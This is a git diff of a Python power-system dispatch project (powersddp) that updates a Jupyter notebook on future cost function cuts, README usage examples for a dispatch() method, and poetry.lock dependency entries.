lorscale\":{\"diverging\":[[0,\"#8e0152\"],[0.1,\"#c51b7d\"],[0.2,\"#de77ae\"],[0.3,\"#f1b6da\"],[0.4,\"#fde0ef\"],[0.5,\"#f7f7f7\"],[0.6,\"#e6f5d0\"],[0.7,\"#b8e186\"],[0.8,\"#7fbc41\"],[0.9,\"#4d9221\"],[1,\"#276419\"]],\"sequential\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"sequentialminus\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]]},\"colorway\":[\"#636efa\",\"#EF553B\",\"#00cc96\",\"#ab63fa\",\"#FFA15A\",\"#19d3f3\",\"#FF6692\",\"#B6E880\",\"#FF97FF\",\"#FECB52\"],\"font\":{\"color\":\"#2a3f5f\"},\"geo\":{\"bgcolor\":\"white\",\"lakecolor\":\"white\",\"landcolor\":\"#E5ECF6\",\"showlakes\":true,\"showland\":true,\"subunitcolor\":\"white\"},\"hoverlabel\":{\"align\":\"left\"},\"hovermode\":\"closest\",\"mapbox\":{\"style\":\"light\"},\"paper_bgcolor\":\"white\",\"plot_bgcolor\":\"#E5ECF6\",\"polar\":{\"angularaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"radialaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"scene\":{\"xaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"yaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"zaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showb
ackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"}},\"shapedefaults\":{\"line\":{\"color\":\"#2a3f5f\"}},\"ternary\":{\"aaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"baxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"caxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"title\":{\"x\":0.05},\"xaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2},\"yaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2}}},\"title\":{\"text\":\"Future Cost Function\"},\"xaxis\":{\"anchor\":\"y\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis2\":{\"anchor\":\"y2\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis3\":{\"anchor\":\"y3\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"yaxis\":{\"anchor\":\"x\",\"domain\":[0.7333333333333333,1.0],\"title\":{\"text\":\"$/MW\"}},\"yaxis2\":{\"anchor\":\"x2\",\"domain\":[0.36666666666666664,0.6333333333333333],\"title\":{\"text\":\"$/MW\"}},\"yaxis3\":{\"anchor\":\"x3\",\"domain\":[0.0,0.26666666666666666],\"title\":{\"text\":\"$/MW\"}}}, {\"responsive\": true} ).then(function(){\n",
+ " \n",
+ "var gd = document.getElementById('5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25');\n",
+ "var x = new MutationObserver(function (mutations, observer) {{\n",
+ " var display = window.getComputedStyle(gd).display;\n",
+ " if (!display || display === 'none') {{\n",
+ " console.log([gd, 'removed!']);\n",
+ " Plotly.purge(gd);\n",
+ " observer.disconnect();\n",
+ " }}\n",
+ "}});\n",
+ "\n",
+ "// Listen for the removal of the full notebook cells\n",
+ "var notebookContainer = gd.closest('#notebook-container');\n",
+ "if (notebookContainer) {{\n",
+ " x.observe(notebookContainer, {childList: true});\n",
+ "}}\n",
+ "\n",
+ "// Listen for the clearing of the current output cell\n",
+ "var outputEl = gd.closest('.output');\n",
+ "if (outputEl) {{\n",
+ " x.observe(outputEl, {childList: true});\n",
+ "}}\n",
+ "\n",
+ " }) }; }); </script> </div>"
+ ]
+ },
+ "metadata": {},
+ "output_type": "display_data"
}
],
"source": [
- "import powersddp\n",
+ "from itertools import product\n",
+ "import numpy as np\n",
+ "\n",
+ "n_hgu = len(TestSystem.data['hydro-units'])\n",
+ "n_tgu = len(TestSystem.data['thermal-units'])\n",
+ "\n",
+ "step = 100/(TestSystem.data['discretizations']-1)\n",
+ "discretizations = list(product(np.arange(0,100+step,step), repeat=n_hgu))\n",
"\n",
- "system = powersddp.PowerSystem(path='system.yml')\n",
+ "cuts = []\n",
+ "operation = []\n",
+ "for stage in range(TestSystem.data['stages'],0,-1):\n",
+ " for discretization in discretizations:\n",
+ " \n",
+ " v_i = []\n",
+ " # For Every Hydro Unit\n",
+ " for i, hgu in enumerate(TestSystem.data['hydro-units']):\n",
+ " v_i.append(hgu['v_min'] + (hgu['v_max']-hgu['v_min'])*discretization[i]/100)\n",
+ " \n",
+ " # For Every Scenario\n",
+ " average = 0.\n",
+ " avg_water_marginal_cost = [0 for _ in TestSystem.data[\"hydro-units\"]]\n",
+ " for scenario in range(TestSystem.data['scenarios']):\n",
+ " inflow = []\n",
+ " for i, hgu in enumerate(TestSystem.data['hydro-units']):\n",
+ " inflow.append(hgu['inflow_scenarios'][stage-1][scenario])\n",
+ " \n",
+ " result = dispatch(TestSystem, v_i, inflow, cuts, stage+1)\n",
+ " average += result[\"total_cost\"]\n",
+ " for i, hgu in enumerate(result[\"hydro_units\"]):\n",
+ " avg_water_marginal_cost[i] += hgu[\"water_marginal_cost\"]\n",
"\n",
- "print(\"System Load: {}\\n\"\n",
- " \"Number of HGUs: {}\\n\"\n",
- " \"Number of TGUs: {}\".format(system.data['load'],\n",
- " len(system.data['hydro-units']),\n",
- " len(system.data['thermal-units'])))"
+ " # Calculating the average of the scenarios\n",
+ " average = average/TestSystem.data['scenarios']\n",
+ " coef_b = average\n",
+ " for i, hgu in enumerate(result[\"hydro_units\"]):\n",
+    "            # ! Invert the coefficient because the minimization problem inverts the sign\n",
+ " avg_water_marginal_cost[i] = - avg_water_marginal_cost[i]/TestSystem.data['scenarios']\n",
+ " coef_b -= v_i[i]*avg_water_marginal_cost[i]\n",
+ " \n",
+ " cuts.append({\"stage\": stage, \"coef_b\": coef_b, \"coefs\": avg_water_marginal_cost})\n",
+ " operation.append({'stage': stage, 'discretization': discretization[i], 'v_i': v_i[0], 'average_cost': round(average,2)})\n",
+ "operation_df = pd.DataFrame(operation)\n",
+ "\n",
+ "if n_hgu == 1:\n",
+ " plot_future_cost_function(operation=operation_df)"
]
},
{
"cell_type": "code",
- "execution_count": 1,
- "id": "07837a84-da91-47bf-a749-d4292fde6d57",
+ "execution_count": 13,
+ "id": "87285cd1-3bb7-4c72-bb43-4f2baf6e4077",
"metadata": {},
"outputs": [
{
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System Load: [50, 50, 50]\n",
- "Number of HGUs: 1\n",
- "Number of TGUs: 2\n"
- ]
+ "data": {
+ "text/html": [
+ "<div>\n",
+ "<style scoped>\n",
+ " .dataframe tbody tr th:only-of-type {\n",
+ " vertical-align: middle;\n",
+ " }\n",
+ "\n",
+ " .dataframe tbody tr th {\n",
+ " vertical-align: top;\n",
+ " }\n",
+ "\n",
+ " .dataframe thead th {\n",
+ " text-align: right;\n",
+ " }\n",
+ "</style>\n",
+ "<table border=\"1\" class=\"dataframe\">\n",
+ " <thead>\n",
+ " <tr style=\"text-align: right;\">\n",
+ " <th></th>\n",
+ " <th>stage</th>\n",
+ " <th>discretization</th>\n",
+ " <th>v_i</th>\n",
+ " <th>average_cost</th>\n",
+ " </tr>\n",
+ " </thead>\n",
+ " <tbody>\n",
+ " <tr>\n",
+ " <th>0</th>\n",
+ " <td>3</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>6725.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>1</th>\n",
+ " <td>3</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>7.75</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>2</th>\n",
+ " <td>3</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>-0.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>3</th>\n",
+ " <td>2</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>11787.50</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>4</th>\n",
+ " <td>2</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>226.93</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>5</th>\n",
+ " <td>2</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>0.62</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>6</th>\n",
+ " <td>1</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>15425.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>7</th>\n",
+ " <td>1</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>576.31</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>8</th>\n",
+ " <td>1</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>161.68</td>\n",
+ " </tr>\n",
+ " </tbody>\n",
+ "</table>\n",
+ "</div>"
+ ],
+ "text/plain": [
+ " stage discretization v_i average_cost\n",
+ "0 3 0.0 20.0 6725.00\n",
+ "1 3 50.0 60.0 7.75\n",
+ "2 3 100.0 100.0 -0.00\n",
+ "3 2 0.0 20.0 11787.50\n",
+ "4 2 50.0 60.0 226.93\n",
+ "5 2 100.0 100.0 0.62\n",
+ "6 1 0.0 20.0 15425.00\n",
+ "7 1 50.0 60.0 576.31\n",
+ "8 1 100.0 100.0 161.68"
+ ]
+ },
+ "execution_count": 13,
+ "metadata": {},
+ "output_type": "execute_result"
}
],
"source": [
- "import powersddp\n",
- "\n",
- "payload = {'load': [50, 50, 50],\n",
- " 'discretizations': 3,\n",
- " 'stages': 3,\n",
- " 'scenarios': 2,\n",
- " 'outage_cost': 500,\n",
- " 'hydro-units': [{'name': 'HU1',\n",
- " 'v_max': 100,\n",
- " 'v_min': 20,\n",
- " 'prod': 0.95,\n",
- " 'flow_max': 60,\n",
- " 'inflow_scenarios': [[23, 16],\n",
- " [19, 14],\n",
- " [15, 11]]}],\n",
- " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
- " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
- "\n",
- "system = powersddp.PowerSystem(data=payload)\n",
- "\n",
- "print(\"System Load: {}\\n\"\n",
- " \"Number of HGUs: {}\\n\"\n",
- " \"Number of TGUs: {}\".format(system.data['load'],\n",
- " len(system.data['hydro-units']),\n",
- " len(system.data['thermal-units'])))"
+ "operation_df"
]
},
{
- "cell_type": "code",
- "execution_count": null,
- "id": "db680eea-a46e-4f24-a739-aae4117bb19e",
+ "cell_type": "markdown",
+ "id": "613592a2-e7e0-4b0a-81b9-a5d0126dde67",
"metadata": {},
- "outputs": [],
- "source": []
+ "source": [
+ "## Considering the Future Cost Function\n",
+ "\n",
+ "### Modelling the cost of water\n",
+ "\n",
+    "Now, let's consider the Future Cost Function to back propagate the solutions. Back propagating means that the future cost function of the \"stage ahead\" is used as input for the previous stage's solution.\n",
+ "\n",
+    "Assuming that any Future Cost Function is approximated by a series of straight-line segments, any given point can be identified by a straight line, which is mathematically represented by:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\alpha = a \\cdot v_f + b\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+    "where $\\alpha$ is the cost at a given final volume. We shall find the coefficients $a$ and $b$:\n",
+ "\n",
+    "- $a$: the marginal cost of the water, which comes from the solution of the minimization problem.\n",
+ "\n",
+    "If we assume $\\alpha = 75$ and $v_f = 60$, meaning a cost of $\\$75.00$ at Final Volume $60 hm^3$, that gives us:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " b = \\alpha - a \\cdot v_f\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "> Naturally, this process is repeated for every discretization used in the problem.\n",
+ "\n",
+ "> $a$ is given by averaging the water marginal cost over every scenario considered.\n",
+ "\n",
+ "If we evaluate for multiple Hydro Units, naturally:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ "    \\alpha = b + \\sum_{i=1}^{n} a_i \\cdot v_{f_i}\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "Where $n$ = number of Hydro units\n",
+ "\n",
+ "### Considering the cost function in the back propagation\n",
+ "\n",
+ "In the previous stage (back-propagating from the end to the beginning) we have the objective function:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v + \\alpha\\\\\n",
+ " \\textrm{s.t.} \\quad & \\\\\n",
+ " \\textrm{hydro balance} \\quad & v_f(i) = v_i(i) + afl(i) - v_t(i) - v_v(i) \\\\\n",
+ " \\textrm{load supplying} \\quad & \\rho\\cdot v_t(i) + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
+ " \\textrm{considering the forward state}\\quad & \\\\\n",
+ "    \\textrm{for every scenario } s \\quad & \\alpha \\geq a^{s} \\cdot v_f(i) + b^{s}\\\\\n",
+ " \\textrm{constraints} \\quad & \\\\\n",
+ " & v_{f_{min}}\\leq v_f(i) \\leq v_{f_{max}}\\\\\n",
+ " & v_{t_{min}}\\leq v_t(i) \\leq v_{t_{max}}\\\\\n",
+ " & v_{v_{min}}\\leq v_v(i) \\leq v_{v_{max}}\\\\\n",
+ " & g_{t_{min}}\\leq g_t^\\ast \\leq g_{t_{max}}\\\\\n",
+ " ^\\ast \\textrm{for each TGU}& \n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$"
+ ]
}
],
"metadata": {
diff --git a/README.md b/README.md
index 9294885..e375b86 100644
--- a/README.md
+++ b/README.md
@@ -27,9 +27,9 @@ There are two ways of initializing a `Power System`. Either by providing a `.yml
### Initializing a `PowerSystem`
```Python
-import powersddp
+import powersddp as psddp
-system = powersddp.PowerSystem(path='system.yml')
+system = psddp.PowerSystem(path='system.yml')
print("System Load: {}\n"
"Number of HGUs: {}\n"
@@ -39,25 +39,23 @@ print("System Load: {}\n"
```
```Python
-import powersddp
-
-payload = {'load': [50, 50, 50],
- 'discretizations': 3,
- 'stages': 3,
- 'scenarios': 2,
- 'outage_cost': 500,
- 'hydro-units': [{'name': 'HU1',
- 'v_max': 100,
- 'v_min': 20,
- 'prod': 0.95,
- 'flow_max': 60,
- 'inflow_scenarios': [[23, 16],
- [19, 14],
- [15, 11]]}],
- 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
- {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
-
-system = powersddp.PowerSystem(data=payload)
+import powersddp as psddp
+
+data = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+PowerSystem = psddp.PowerSystem(data=data)
print("System Load: {}\n"
"Number of HGUs: {}\n"
@@ -66,4 +64,37 @@ print("System Load: {}\n"
len(system.data['thermal-units'])))
```
+### Dispatching a `PowerSystem`
+
+#### **dispatch()** accepts the following arguments:
+
+- `verbose : bool, optional, defaults to False`
+ - Displays the PDDE solution for every stage of the execution. Use with care, solutions of complex systems with too many stages and scenarios might overflow the console.
+
+- `plot : bool, optional, defaults to False`
+ - Displays a sequence of plots showing the future cost function for every stage of the execution.
+
+
+```Python
+import powersddp as psddp
+
+data = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+PowerSystem = psddp.PowerSystem(data=data)
+operation = PowerSystem.dispatch()
+
+print(operation)
+```
<!-- <img src="https://render.githubusercontent.com/render/math?math=e^{i \pi} = -1"> -->
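The cut construction derived in the notebook ($b = \alpha - a \cdot v_f$) can be sketched in a few lines of plain Python. This is a standalone illustration only; `build_cut` is a hypothetical helper, not part of the `powersddp` API, though it mirrors the `{"stage", "coef_b", "coefs"}` dictionaries used internally by `dispatch()`:

```python
# Hypothetical helper (not part of powersddp): build one future-cost cut
# alpha >= coef_b + sum(coefs_i * v_f_i) from a solved stage.

def build_cut(stage, alpha, marginal_costs, final_volumes):
    # coef_b is recovered from the known point (final_volumes, alpha):
    # b = alpha - sum(a_i * v_f_i)
    coef_b = alpha - sum(a * v for a, v in zip(marginal_costs, final_volumes))
    return {"stage": stage, "coef_b": coef_b, "coefs": list(marginal_costs)}

# Single hydro unit, alpha = 75 at v_f = 60 with water marginal cost 0.25:
cut = build_cut(stage=2, alpha=75.0, marginal_costs=[0.25], final_volumes=[60.0])
print(cut["coef_b"])  # 75 - 0.25 * 60 = 60.0
```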
diff --git a/poetry.lock b/poetry.lock
index 7944ec3..a74fecf 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -683,6 +683,14 @@ docs = ["sphinx", "nbsphinx", "sphinxcontrib-github-alt", "sphinx-rtd-theme", "m
json-logging = ["json-logging"]
test = ["pytest", "coverage", "requests", "nbval", "selenium", "pytest-cov", "requests-unixsocket"]
+[[package]]
+name = "numpy"
+version = "1.21.1"
+description = "NumPy is the fundamental package for array computing with Python."
+category = "main"
+optional = false
+python-versions = ">=3.7"
+
[[package]]
name = "packaging"
version = "21.0"
@@ -694,6 +702,22 @@ python-versions = ">=3.6"
[package.dependencies]
pyparsing = ">=2.0.2"
+[[package]]
+name = "pandas"
+version = "1.3.2"
+description = "Powerful data structures for data analysis, time series, and statistics"
+category = "main"
+optional = false
+python-versions = ">=3.7.1"
+
+[package.dependencies]
+numpy = ">=1.17.3"
+python-dateutil = ">=2.7.3"
+pytz = ">=2017.3"
+
+[package.extras]
+test = ["hypothesis (>=3.58)", "pytest (>=6.0)", "pytest-xdist"]
+
[[package]]
name = "pandocfilters"
version = "1.4.3"
@@ -741,6 +765,18 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "plotly"
+version = "5.2.1"
+description = "An open-source, interactive data visualization library for Python"
+category = "main"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+six = "*"
+tenacity = ">=6.2.0"
+
[[package]]
name = "pluggy"
version = "0.13.1"
@@ -863,7 +899,7 @@ testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "requests", "xm
name = "python-dateutil"
version = "2.8.2"
description = "Extensions to the standard Python datetime module"
-category = "dev"
+category = "main"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
@@ -874,7 +910,7 @@ six = ">=1.5"
name = "pytz"
version = "2021.1"
description = "World timezone definitions, modern and historical"
-category = "dev"
+category = "main"
optional = false
python-versions = "*"
@@ -969,7 +1005,7 @@ win32 = ["pywin32"]
name = "six"
version = "1.16.0"
description = "Python 2 and 3 compatibility utilities"
-category = "dev"
+category = "main"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*"
@@ -981,6 +1017,17 @@ category = "dev"
optional = false
python-versions = ">=3.5"
+[[package]]
+name = "tenacity"
+version = "8.0.1"
+description = "Retry code until it succeeds"
+category = "main"
+optional = false
+python-versions = ">=3.6"
+
+[package.extras]
+doc = ["reno", "sphinx", "tornado (>=4.5)"]
+
[[package]]
name = "terminado"
version = "0.11.0"
@@ -1114,7 +1161,7 @@ python-versions = "*"
[metadata]
lock-version = "1.1"
python-versions = "^3.8"
-content-hash = "a80ab2d038ebd23b2a35fddb2e703975351608f10eedf2519677c49d97feb518"
+content-hash = "cae2aa10dea3acba3f146c7781ed78b2fb59bceac409a73911ca7d08dbffb158"
[metadata.files]
anyio = [
@@ -1531,10 +1578,61 @@ notebook = [
{file = "notebook-6.4.3-py3-none-any.whl", hash = "sha256:b50eafa8208d5db966efd1caa4076b4dfc51815e02a805b32ecd717e9e6cc071"},
{file = "notebook-6.4.3.tar.gz", hash = "sha256:e6b6dfed36b00cf950f63c0d42e947c101d4258aec21624de62b9e0c11ed5c0d"},
]
+numpy = [
+ {file = "numpy-1.21.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:38e8648f9449a549a7dfe8d8755a5979b45b3538520d1e735637ef28e8c2dc50"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:fd7d7409fa643a91d0a05c7554dd68aa9c9bb16e186f6ccfe40d6e003156e33a"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:a75b4498b1e93d8b700282dc8e655b8bd559c0904b3910b144646dbbbc03e062"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1412aa0aec3e00bc23fbb8664d76552b4efde98fb71f60737c83efbac24112f1"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:e46ceaff65609b5399163de5893d8f2a82d3c77d5e56d976c8b5fb01faa6b671"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:c6a2324085dd52f96498419ba95b5777e40b6bcbc20088fddb9e8cbb58885e8e"},
+ {file = "numpy-1.21.1-cp37-cp37m-win32.whl", hash = "sha256:73101b2a1fef16602696d133db402a7e7586654682244344b8329cdcbbb82172"},
+ {file = "numpy-1.21.1-cp37-cp37m-win_amd64.whl", hash = "sha256:7a708a79c9a9d26904d1cca8d383bf869edf6f8e7650d85dbc77b041e8c5a0f8"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:95b995d0c413f5d0428b3f880e8fe1660ff9396dcd1f9eedbc311f37b5652e16"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:635e6bd31c9fb3d475c8f44a089569070d10a9ef18ed13738b03049280281267"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4a3d5fb89bfe21be2ef47c0614b9c9c707b7362386c9a3ff1feae63e0267ccb6"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8a326af80e86d0e9ce92bcc1e65c8ff88297de4fa14ee936cb2293d414c9ec63"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:791492091744b0fe390a6ce85cc1bf5149968ac7d5f0477288f78c89b385d9af"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0318c465786c1f63ac05d7c4dbcecd4d2d7e13f0959b01b534ea1e92202235c5"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:9a513bd9c1551894ee3d31369f9b07460ef223694098cf27d399513415855b68"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:91c6f5fc58df1e0a3cc0c3a717bb3308ff850abdaa6d2d802573ee2b11f674a8"},
+ {file = "numpy-1.21.1-cp38-cp38-win32.whl", hash = "sha256:978010b68e17150db8765355d1ccdd450f9fc916824e8c4e35ee620590e234cd"},
+ {file = "numpy-1.21.1-cp38-cp38-win_amd64.whl", hash = "sha256:9749a40a5b22333467f02fe11edc98f022133ee1bfa8ab99bda5e5437b831214"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:d7a4aeac3b94af92a9373d6e77b37691b86411f9745190d2c351f410ab3a791f"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d9e7912a56108aba9b31df688a4c4f5cb0d9d3787386b87d504762b6754fbb1b"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:25b40b98ebdd272bc3020935427a4530b7d60dfbe1ab9381a39147834e985eac"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8a92c5aea763d14ba9d6475803fc7904bda7decc2a0a68153f587ad82941fec1"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:05a0f648eb28bae4bcb204e6fd14603de2908de982e761a2fc78efe0f19e96e1"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f01f28075a92eede918b965e86e8f0ba7b7797a95aa8d35e1cc8821f5fc3ad6a"},
+ {file = "numpy-1.21.1-cp39-cp39-win32.whl", hash = "sha256:88c0b89ad1cc24a5efbb99ff9ab5db0f9a86e9cc50240177a571fbe9c2860ac2"},
+ {file = "numpy-1.21.1-cp39-cp39-win_amd64.whl", hash = "sha256:01721eefe70544d548425a07c80be8377096a54118070b8a62476866d5208e33"},
+ {file = "numpy-1.21.1-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:2d4d1de6e6fb3d28781c73fbde702ac97f03d79e4ffd6598b880b2d95d62ead4"},
+ {file = "numpy-1.21.1.zip", hash = "sha256:dff4af63638afcc57a3dfb9e4b26d434a7a602d225b42d746ea7fe2edf1342fd"},
+]
packaging = [
{file = "packaging-21.0-py3-none-any.whl", hash = "sha256:c86254f9220d55e31cc94d69bade760f0847da8000def4dfe1c6b872fd14ff14"},
{file = "packaging-21.0.tar.gz", hash = "sha256:7dc96269f53a4ccec5c0670940a4281106dd0bb343f47b7471f779df49c2fbe7"},
]
+pandas = [
+ {file = "pandas-1.3.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ba7ceb8abc6dbdb1e34612d1173d61e4941f1a1eb7e6f703b2633134ae6a6c89"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fcb71b1935249de80e3a808227189eee381d4d74a31760ced2df21eedc92a8e3"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fa54dc1d3e5d004a09ab0b1751473698011ddf03e14f1f59b84ad9a6ac630975"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:34ced9ce5d5b17b556486da7256961b55b471d64a8990b56e67a84ebeb259416"},
+ {file = "pandas-1.3.2-cp37-cp37m-win32.whl", hash = "sha256:a56246de744baf646d1f3e050c4653d632bc9cd2e0605f41051fea59980e880a"},
+ {file = "pandas-1.3.2-cp37-cp37m-win_amd64.whl", hash = "sha256:53b17e4debba26b7446b1e4795c19f94f0c715e288e08145e44bdd2865e819b3"},
+ {file = "pandas-1.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:f07a9745ca075ae73a5ce116f5e58f691c0dc9de0bff163527858459df5c176f"},
